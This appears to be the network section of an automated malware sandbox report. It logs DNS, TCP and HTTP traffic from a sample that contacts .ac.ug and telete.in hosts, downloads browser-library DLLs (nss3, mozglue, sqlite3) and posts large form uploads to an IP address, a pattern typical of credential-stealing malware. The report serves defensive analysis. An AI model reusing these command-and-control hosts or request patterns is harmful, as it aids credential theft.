Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| myproskxa.ac.ug | 185.215.113.77 | |
| kullasa.ac.ug | 185.215.113.77 | |
| telete.in | 195.201.225.248 |
- TCP Requests
-
-
192.168.56.102:49175 185.163.45.248:80
-
192.168.56.102:49180 185.163.45.248:80
-
192.168.56.102:49174 185.215.113.77:80kullasa.ac.ug
-
192.168.56.102:49176 185.215.113.77:80kullasa.ac.ug
-
192.168.56.102:49179 185.215.113.77:80kullasa.ac.ug
-
192.168.56.102:49250 185.215.113.77:80kullasa.ac.ug
-
192.168.56.102:49172 195.201.225.248:443telete.in
-
- UDP Requests
-
-
192.168.56.102:52062 164.124.101.2:53
-
192.168.56.102:52336 164.124.101.2:53
-
192.168.56.102:64995 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:49164 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.102:52062
-
GET
200
https://telete.in/brikitiki
REQUEST
RESPONSE
BODY
GET /brikitiki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: telete.in
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Tue, 17 Aug 2021 01:07:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=180a4c15526ed976aa_17860572205860510524; expires=Wed, 18 Aug 2021 01:07:32 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=35768000
POST
200
http://myproskxa.ac.ug/index.php
REQUEST
RESPONSE
BODY
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: myproskxa.ac.ug
Content-Length: 91
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:07:32 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html
POST
200
http://185.163.45.248/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 185.163.45.248
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Aug 2021 01:07:45 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
POST
200
http://kullasa.ac.ug/softokn3.dll
REQUEST
RESPONSE
BODY
POST /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:07:32 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT
ETag: "235d0-58a9fc6206c00"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://kullasa.ac.ug/sqlite3.dll
REQUEST
RESPONSE
BODY
POST /sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:07:34 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT
ETag: "9d9d8-5561b116cc500"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://kullasa.ac.ug/freebl3.dll
REQUEST
RESPONSE
BODY
POST /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:07:51 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT
ETag: "519d0-58a9fc2e87280"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://kullasa.ac.ug/mozglue.dll
REQUEST
RESPONSE
BODY
POST /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:07:59 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT
ETag: "217d0-58a9fc4382400"
Accept-Ranges: bytes
Content-Length: 137168
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://kullasa.ac.ug/msvcp140.dll
REQUEST
RESPONSE
BODY
POST /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:08:02 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT
ETag: "6b738-58a9fc4d0ba80"
Accept-Ranges: bytes
Content-Length: 440120
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://kullasa.ac.ug/nss3.dll
REQUEST
RESPONSE
BODY
POST /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:08:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT
ETag: "1303d0-58a9fc5a65a00"
Accept-Ranges: bytes
Content-Length: 1246160
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/octet-stream
GET
200
http://185.163.45.248//l/f/VAuJUXsBPvGyIjkLtOpJ/cc451af81c78b4f59363dcc043c781304dfe0ce1
REQUEST
RESPONSE
BODY
GET //l/f/VAuJUXsBPvGyIjkLtOpJ/cc451af81c78b4f59363dcc043c781304dfe0ce1 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 185.163.45.248
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Aug 2021 01:08:19 GMT
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Sat, 10 Jul 2021 15:08:05 GMT
ETag: "60e9b7d5-2b281b"
Accept-Ranges: bytes
POST
200
http://185.163.45.248/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
Content-Length: 328354
Host: 185.163.45.248
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 17 Aug 2021 01:09:01 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
POST
200
http://kullasa.ac.ug/vcruntime140.dll
REQUEST
RESPONSE
BODY
POST /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:09:15 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:02:02 GMT
ETag: "14748-58a9fc6b90280"
Accept-Ranges: bytes
Content-Length: 83784
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
POST
200
http://kullasa.ac.ug/main.php
REQUEST
RESPONSE
BODY
POST /main.php HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:09:16 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
POST
200
http://kullasa.ac.ug/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 81472
Host: kullasa.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 17 Aug 2021 01:09:17 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.102 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.102:49172 195.201.225.248:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=telecut.in | 1d:7b:94:0d:d6:f9:85:f3:66:74:d5:1d:98:0c:7a:28:5b:c0:62:44 |
Snort Alerts
No Snort Alerts